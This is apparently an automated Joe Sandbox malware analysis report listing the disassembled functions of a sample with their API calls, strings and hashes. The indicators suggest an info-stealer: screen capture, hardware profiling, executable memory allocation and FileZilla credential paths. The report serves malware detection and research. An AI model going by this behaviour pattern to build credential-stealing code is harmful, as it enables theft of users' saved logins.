Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: 9a%^$M%$Screen.png
API String ID: 0-2021954137
Opcode ID: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
Instruction ID: 11fefa64aaa65e2afc3480572e0d96af9cd0f56f536a59b59af3bc8bd9e58722
Opcode Fuzzy Hash: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
Instruction Fuzzy Hash: 4691D8B6E005098ADF248E98888557EB6B4AB9C312F647917E416FB390E37CCF41875B

Function 00402FCC Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 283libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402FE0
LoadLibraryA.KERNELBASE(my-global-render.dll), ref: 00402FEA

Strings

my-global-render.dll, xrefs: 00402FE5
advapi32.dll, xrefs: 00402FDB

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: advapi32.dll$my-global-render.dll
API String ID: 1029625771-772900288
Opcode ID: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
Instruction ID: f2405b5e0aceb9a51e137d87bf907524102569514c3531be8be57496d61f3bc2
Opcode Fuzzy Hash: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
Instruction Fuzzy Hash: 6BA1F872D0412A86CF64CE98994527E6E78BB10351F250A3BE915FA3D0C7BCCF41A79B

Function 004338B5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 200COMMON

Download Yara Rule

Strings

~rjz, xrefs: 0043399A
^^4, xrefs: 00433A0A
^^4, xrefs: 004339F5

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: ^^4$^^4$~rjz
API String ID: 0-2511145224
Opcode ID: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
Instruction ID: fe384b451c266d20576388885646b2b98754c57df49fd09348afa64f247ec54d
Opcode Fuzzy Hash: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
Instruction Fuzzy Hash: 9E618C72E0011947EF287D4888855BEB7919B88B1AF342927F115FB391C76C8F4D974B

Function 00453B82 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36

Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF

Strings

Eastern Standard Time, xrefs: 00453CCF
Eastern Summer Time, xrefs: 00453CE3

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: ByteCharInformationMultiTimeWideZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 1123094072-239921721
Opcode ID: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
Instruction ID: af1a61733d26d89116c9bb65ccd9636383a7b5e966e3c510a6c9de8ec0de26fa
Opcode Fuzzy Hash: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
Instruction Fuzzy Hash: FC4199B2D00115BBDB106FA6DC46A5ABF78EF04396F10406BFD04A7162E7789F148B99

Function 004439BA Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0044387B,?,00443A9B,00000000,?,?,0044387B,A925AEC7,?,0044387B), ref: 004439CB
TerminateProcess.KERNEL32(00000000,?,00443A9B,00000000,?,?,0044387B,A925AEC7,?,0044387B), ref: 004439D2
ExitProcess.KERNEL32 ref: 004439E4

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
Instruction ID: af00403c123718aebf8df8255158ed5eb80799a0d3dec5c869f97e29736db2e2
Opcode Fuzzy Hash: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
Instruction Fuzzy Hash: 7ED09E71404115BBEF113F61DC0E9593F2AAF40787B144029F90596132DFF59E51DB99

Function 0041D057 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(00000000,?,?,0041A650), ref: 0041D07D

Strings

advapi32.dll, xrefs: 0041D06A

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: advapi32.dll
API String ID: 2104809126-4050573280
Opcode ID: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
Instruction ID: 6db1735cda00ed3d220bfaf1cacc4b3e5e01bff1461a9ef13bbd23f8b442f0e3
Opcode Fuzzy Hash: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
Instruction Fuzzy Hash: 9BF0E9F3D4013126F61025AA5C01ABB7E888B46729F140177FD0CE6281E21E9D8242EA

Function 0044E224 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
Instruction ID: f015b3b87cbc766378ce5f0d68a15eb43446f93644205f51174f0ce78f182e30
Opcode Fuzzy Hash: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
Instruction Fuzzy Hash: 3AE08631100214ABEF112BA2AD0AB5A3B9CBF80355F104065F60896161EBB88850C7DD

Function 04200E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,04200223,?,?), ref: 04200E19
SetErrorMode.KERNELBASE(00000000,?,?,04200223,?,?), ref: 04200E1E

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 7f18243f094355aed393038a9e4f666a0cd0c293d4ed3e5987dac0fabc226c75
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 4DD0123124512877D7002A94DC09BCD7B5CDF09B62F008011FB0DE9081C770954046E5

Function 00418BA2 Relevance: 1.8, APIs: 1, Instructions: 313COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00418BDF

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
Instruction ID: 1d70213f864448114667fa93143398f689e43ce09380febb34e55b8e9c3c6d32
Opcode Fuzzy Hash: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
Instruction Fuzzy Hash: AEC1ECB1A05B009FD724CF29C88166BFBE5FF88314F14892EE5AA83750E774E845CB56

Function 0044CFE0 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
Instruction ID: 373710123005f16d466fbf61102d91235a16be84b9ed3eb2ab6254e0a7e141d7
Opcode Fuzzy Hash: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
Instruction Fuzzy Hash: B6016D33B001145FBF11CE69EC4595B3796EBC1328B244132F904CB185FB39CC028389

Function 0045699F Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044EB6F: RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1

RtlReAllocateHeap.NTDLL(00000000,00000000,00413871,00000000,00000000,00000000,00413871,00000000,00000000,7750F770,?,0041A136,00001FE6,00003CA7,?,000016E5), ref: 004569FC

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
Instruction ID: a5a40cd43560794f83e54c6bbfcb227c9197063c5c667a14a31a2b77de81b9f8
Opcode Fuzzy Hash: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
Instruction Fuzzy Hash: 80F0C8B110011576AB212A279C01B6B276C9FC1B76F56013FFC1497293EE7C9809C29E

Function 00450330 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
Instruction ID: 035a614d3876f6906020b157cdd10206fdefeae5334def747215f66390aa104c
Opcode Fuzzy Hash: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
Instruction Fuzzy Hash: BBF05939200620A7AB205B728C01B6B3758AF81772B044127FC08DA282DA38DC09C6EE

Function 0044EB6F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
Instruction ID: b54a30de40d39881521df567edad888a5efcf5dcf9e065f2953d68bc5b8e4da5
Opcode Fuzzy Hash: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
Instruction Fuzzy Hash: 3AE0E5212001A56AFA30A767CC01B6B3A4DFF417B8F010037ED47A62D1DBACEC0285AE

Function 0277913D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0277918E

Memory Dump Source

Source File: 00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp, Offset: 02778000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2778000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: d9ce2544757ee690adb991b9ea77ff0065fbb3f1af8012c1cab67ae5992f8ef4
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 08113C79A00208EFDB01DF98C989E99BBF5AF08350F0580A4FA489B361D371EA50DF80

Non-executed Functions

Function 04236D43 Relevance: 66.8, APIs: 20, Strings: 17, Instructions: 2004COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 04237271
_strlen.LIBCMT ref: 04237A39
_strlen.LIBCMT ref: 04237AF2
_strlen.LIBCMT ref: 04238DB9
EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 04238E0A
_strlen.LIBCMT ref: 04238E13
_strlen.LIBCMT ref: 04238EC6
_strlen.LIBCMT ref: 04238F38

Strings

$jRk, xrefs: 04237321
n: , xrefs: 042388A7
sion, xrefs: 0423889F
y_B>, xrefs: 042383B0
o._, xrefs: 04236EED
y_B>, xrefs: 04236E29
n._, xrefs: 04237210
p7 C, xrefs: 04237447
q7 C, xrefs: 04237452
x_B>, xrefs: 04236E1E
TT4, xrefs: 04237368
Ver, xrefs: 04238897
C: , xrefs: 0423817D
o._, xrefs: 04237E82
Aan(, xrefs: 04237A64
4jn`, xrefs: 042372DE
4jn`, xrefs: 04236FF8

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strlen$DevicesDisplayEnum
String ID: Ver$$jRk$4jn`$4jn`$Aan($C: $TT4$n._$n: $o._$o._$p7 C$q7 C$sion$x_B>$y_B>$y_B>
API String ID: 1530566421-3982382533
Opcode ID: 6eb8ba310e44b2876d547a58f4b1bd6c84751028df2a66b4d8a3ef139639d485
Instruction ID: 28abc732f20c3b8f0eae9c6754692627178cb2246ef32338a06096b249fd69e5
Opcode Fuzzy Hash: 6eb8ba310e44b2876d547a58f4b1bd6c84751028df2a66b4d8a3ef139639d485
Instruction Fuzzy Hash: F203D4F1B30B059BDB349F28C891626B7F4AB44711B14892EE5ABCBB60E771F445CB42

Function 0420D43D Relevance: 42.2, APIs: 5, Strings: 18, Instructions: 1914stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0420C7E8
lstrlenW.KERNEL32(00001A2F), ref: 0420CB68
lstrlenW.KERNEL32(?), ref: 0420DA68

Strings

Ku^%, xrefs: 0420D66E
Y[[T, xrefs: 0420BCAE
Y=`, xrefs: 0420C1CC
Ku^%, xrefs: 0420D552
Ku^%, xrefs: 0420BFB1
Ku^%, xrefs: 0420D45C
Ku^%, xrefs: 0420C0FA
Ku^%, xrefs: 0420C74A
L2&e, xrefs: 0420D262
{#9, xrefs: 0420C8F1
"B!H, xrefs: 0420CF92
Y=`, xrefs: 0420D2E4
L2&e, xrefs: 0420CCE4
"B!H, xrefs: 0420C285
bi, xrefs: 0420BF40
{#9, xrefs: 0420BBF6
K2&e, xrefs: 0420C4C9
Ku^%, xrefs: 0420D9EC

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$Y[[T$bi${#9${#9$Y=`$Y=`
API String ID: 1659193697-3907602706
Opcode ID: 768fb7a2f0fcaf3e91eab243bd8818269c9345fad69c19ca9c68321193467208
Instruction ID: 555b9416e07e3c80436ed450aa82b4a156fee13c64b4245b541d1ce9eda8a1e0
Opcode Fuzzy Hash: 768fb7a2f0fcaf3e91eab243bd8818269c9345fad69c19ca9c68321193467208
Instruction Fuzzy Hash: D0F2D7B1F3161A8BDF349ED888556BDBBF0EB04310F248516E505EB2D2E774BA40DB92

Function 0421FC0B Relevance: 33.6, APIs: 2, Strings: 16, Instructions: 2064COMMON

Download Yara Rule

Strings

JI3i, xrefs: 04220321
_m.Q, xrefs: 042206D3
"w, xrefs: 04220424
EeS, xrefs: 04220F73
VL6T, xrefs: 04220207
KI3i, xrefs: 04221F97
EeS, xrefs: 042210DA
KI3i, xrefs: 04220C26
eo>w, xrefs: 0422006D
_m.Q, xrefs: 04221EE3
EeS, xrefs: 042201FC
VL6T, xrefs: 04221838
fo>w, xrefs: 04220A02
fo>w, xrefs: 042215A2
"w, xrefs: 0421FF86
mNA/, xrefs: 0421FC73

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
API String ID: 0-3469262258
Opcode ID: e6d9c21a7490ec2a00f5106aa89416e629d5b74fe5aeb65d2d60d2ef2e2dda1a
Instruction ID: 940333cea2cae281202974213db5a182ad23de1a9c3b2c3e5250ada020942bba
Opcode Fuzzy Hash: e6d9c21a7490ec2a00f5106aa89416e629d5b74fe5aeb65d2d60d2ef2e2dda1a
Instruction Fuzzy Hash: 2D03D374F2056A9BCF28DF98CB84ABDB6F1EF14704F10095AD515FB260E370AA41DB92

Function 042310D3 Relevance: 27.7, APIs: 7, Strings: 8, Instructions: 1432memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 042311AC
RtlAllocateHeap.NTDLL(?,00000008,00000028), ref: 04231752
GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 04232461
ReleaseDC.USER32(00000000,?), ref: 0423246B

Strings

TT4, xrefs: 042323AE
y_B>, xrefs: 04232494
y_B>, xrefs: 04231735
$jRk, xrefs: 04231632
q7 C, xrefs: 04231200
TT4, xrefs: 0423168C
q7 C, xrefs: 04231A50
?, xrefs: 0423283A

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: AllocateHeap$BitsRelease
String ID: $jRk$?$TT4$TT4$q7 C$q7 C$y_B>$y_B>
API String ID: 2392854675-2600574631
Opcode ID: 0fe5284bdf45d83cd6d71459b9714451c746a96b2f378b9609cc4e18fca22abc
Instruction ID: e1cbe2c7ebbf59c6081e42900622a6e9df0f2b8f3b067d5eed50a06222060bd3
Opcode Fuzzy Hash: 0fe5284bdf45d83cd6d71459b9714451c746a96b2f378b9609cc4e18fca22abc
Instruction Fuzzy Hash: D8C205F4F3052ACBDF24DF98C9806BDB6B4BB04705F20456AD905EB350E371AA51CBA6

Function 0421B4B8 Relevance: 23.7, APIs: 6, Strings: 7, Instructions: 942COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0421B9E2
_strlen.LIBCMT ref: 0421BC83
_strlen.LIBCMT ref: 0421C44C
_strlen.LIBCMT ref: 0421C464

Strings

A@6e, xrefs: 0421B77D
ilen, xrefs: 0421BAEA
^^4, xrefs: 0421BA51
A@6e, xrefs: 0421C35B
^^4, xrefs: 0421C017
ame=, xrefs: 0421BAE2
RY30, xrefs: 0421B6F4

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: A@6e$A@6e$RY30$^^4$^^4$ame=$ilen
API String ID: 4218353326-3679160039
Opcode ID: 6343018893d56b40ec195c5c117dfc83d0fc6755fe54ce157062feabbfcac08c
Instruction ID: 090ace7f8c7b47eeca8eaa8b58fb1e00915e800adec8f7469202be9907a34481
Opcode Fuzzy Hash: 6343018893d56b40ec195c5c117dfc83d0fc6755fe54ce157062feabbfcac08c
Instruction Fuzzy Hash: 2872C575F6021A8BDF34CF98C8925BDBAF0AF24704F244526E515EB6B4E374B640CB92

Function 04235213 Relevance: 18.5, APIs: 2, Strings: 8, Instructions: 1008COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 04235594

Strings

$jRk, xrefs: 0423583C
x_B>, xrefs: 042355A8
TT4, xrefs: 0423631E
y_B>, xrefs: 04235FEF
mE, xrefs: 042356B2
TT4, xrefs: 04235915
y_B>, xrefs: 042355B3
$jRk, xrefs: 0423595A

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strncpy
String ID: $jRk$$jRk$TT4$TT4$mE$x_B>$y_B>$y_B>
API String ID: 2961919466-2403683918
Opcode ID: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
Instruction ID: 667c9a75c8364bc9b8b4448cda8f791e13b92f29cde2fae444fc0ef99f1a9d41
Opcode Fuzzy Hash: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
Instruction Fuzzy Hash: ED82F7F1F3021AABDF24CE98D8555BDB6B4AB05316F25052BD419EB350E770FAC18B82

Function 0422D8BF Relevance: 16.6, Strings: 12, Instructions: 1594COMMON

Download Yara Rule

Strings

?, xrefs: 0422EF3B
Aan(, xrefs: 0422DAF0
@an(, xrefs: 0422DACF
Applications/FileZilla, xrefs: 0422DEB0, 0422DEB5, 0422DECD
%appdata%\FileZilla, xrefs: 0422DEBB, 0422DEC0, 0422DED3
$jRk, xrefs: 0422E140
Aan(, xrefs: 0422DDAA
TT4, xrefs: 0422E196
ST4, xrefs: 0422DBB8
y_B>, xrefs: 0422E278
TT4, xrefs: 0422EDA7
q7 C, xrefs: 0422E6B7

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: $jRk$%appdata%\FileZilla$?$@an($Aan($Aan($Applications/FileZilla$ST4$TT4$TT4$q7 C$y_B>
API String ID: 0-929912511
Opcode ID: ac9e16b0cfef5ad753a7f837f43482241b5d65ef7839f325e8b94ed3ba3a55b2
Instruction ID: 1139473923217a6d54be6837cda2370714b62adc9fa03969546fdec72437510f
Opcode Fuzzy Hash: ac9e16b0cfef5ad753a7f837f43482241b5d65ef7839f325e8b94ed3ba3a55b2
Instruction Fuzzy Hash: 93C208B1F3023ABBDF28AAAC8B5157EB574AF00304F250527E505FA290F6B5B941D793

Function 0421ACB0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 473COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0421AF52
_strlen.LIBCMT ref: 0421B095
_strlen.LIBCMT ref: 0421B47D
_strlen.LIBCMT ref: 0421B498

Strings

(, xrefs: 0421B3DF
&, xrefs: 0421B394
:[, xrefs: 0421B39C

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: &$($:[
API String ID: 4218353326-884455141
Opcode ID: 3034d82a480cb8f89dcfb5f74ad732d6c5b154c1f034d4a1a20f2f670bf56c56
Instruction ID: c87b6764f31c47551850ae898339b34680ffe6f9dead823671f1205c70d94d3d
Opcode Fuzzy Hash: 3034d82a480cb8f89dcfb5f74ad732d6c5b154c1f034d4a1a20f2f670bf56c56
Instruction Fuzzy Hash: 6712D1B0B2565A8BCF18DF58D49066DBBF0EFA4310F14892AE445EB3B4D774BA41CB42

Function 0423A765 Relevance: 11.3, APIs: 1, Strings: 5, Instructions: 823COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0423A9A7

Strings

Y=`, xrefs: 0423A77B
Ku^%, xrefs: 0423ACCD
Y=`, xrefs: 0423AB99
Ju^%, xrefs: 0423A8BF
Y=`, xrefs: 0423A7F1

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: Ju^%$Ku^%$Y=`$Y=`$Y=`
API String ID: 4218353326-1811093487
Opcode ID: 7e7365d4cd31fbe0e14a79a9d93457875f355017f8b93497c9b28fb78c111860
Instruction ID: b08feaa50fef4eba56fea00542095c7d9cd4c69dd1f3476e29b715071575ad26
Opcode Fuzzy Hash: 7e7365d4cd31fbe0e14a79a9d93457875f355017f8b93497c9b28fb78c111860
Instruction Fuzzy Hash: 6F62B1F5F2021A8BCF24CF9888955BDBBB0AB44342F24056AD456FB251E375FA41CB92

Function 0423979C Relevance: 10.9, Strings: 8, Instructions: 905COMMON

Download Yara Rule

Strings

(lu, xrefs: 042398B8
u2B, xrefs: 04239A2F
)lu, xrefs: 04239DFE
n_v, xrefs: 04239E09
)lu, xrefs: 04239913
v2B, xrefs: 04239A3A
n_v, xrefs: 0423A6F9
v2B, xrefs: 04239820

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: (lu$)lu$)lu$n_v$n_v$u2B$v2B$v2B
API String ID: 4218353326-1100714106
Opcode ID: fec3558fb2b960feac3edba5045be27680f3dec78b11801a2127f42b7adf476c
Instruction ID: 242fc8ce717049e49b0f3f65a52fe7baae6dc808f5f416ef97f3620d52f29d73
Opcode Fuzzy Hash: fec3558fb2b960feac3edba5045be27680f3dec78b11801a2127f42b7adf476c
Instruction Fuzzy Hash: F972A8F5F3051A8BCF24CF9CC8855BDBBB0AB15316F14056AD545EB790E3B0AA81CB92

Function 0422859B Relevance: 9.8, Strings: 7, Instructions: 1067COMMON

Download Yara Rule

Strings

y_B>, xrefs: 0422884A
TT4, xrefs: 04229971
$jRk, xrefs: 042292D5
$jRk, xrefs: 042286F6
q7 C, xrefs: 04229526
q7 C, xrefs: 04228D1E
ST4, xrefs: 042285ED

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: $jRk$$jRk$ST4$TT4$q7 C$q7 C$y_B>
API String ID: 0-4120928008
Opcode ID: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
Instruction ID: 3985ef9f58ae415830c538595cd1ed746da78635a1b1a6d489967139ebf314fe
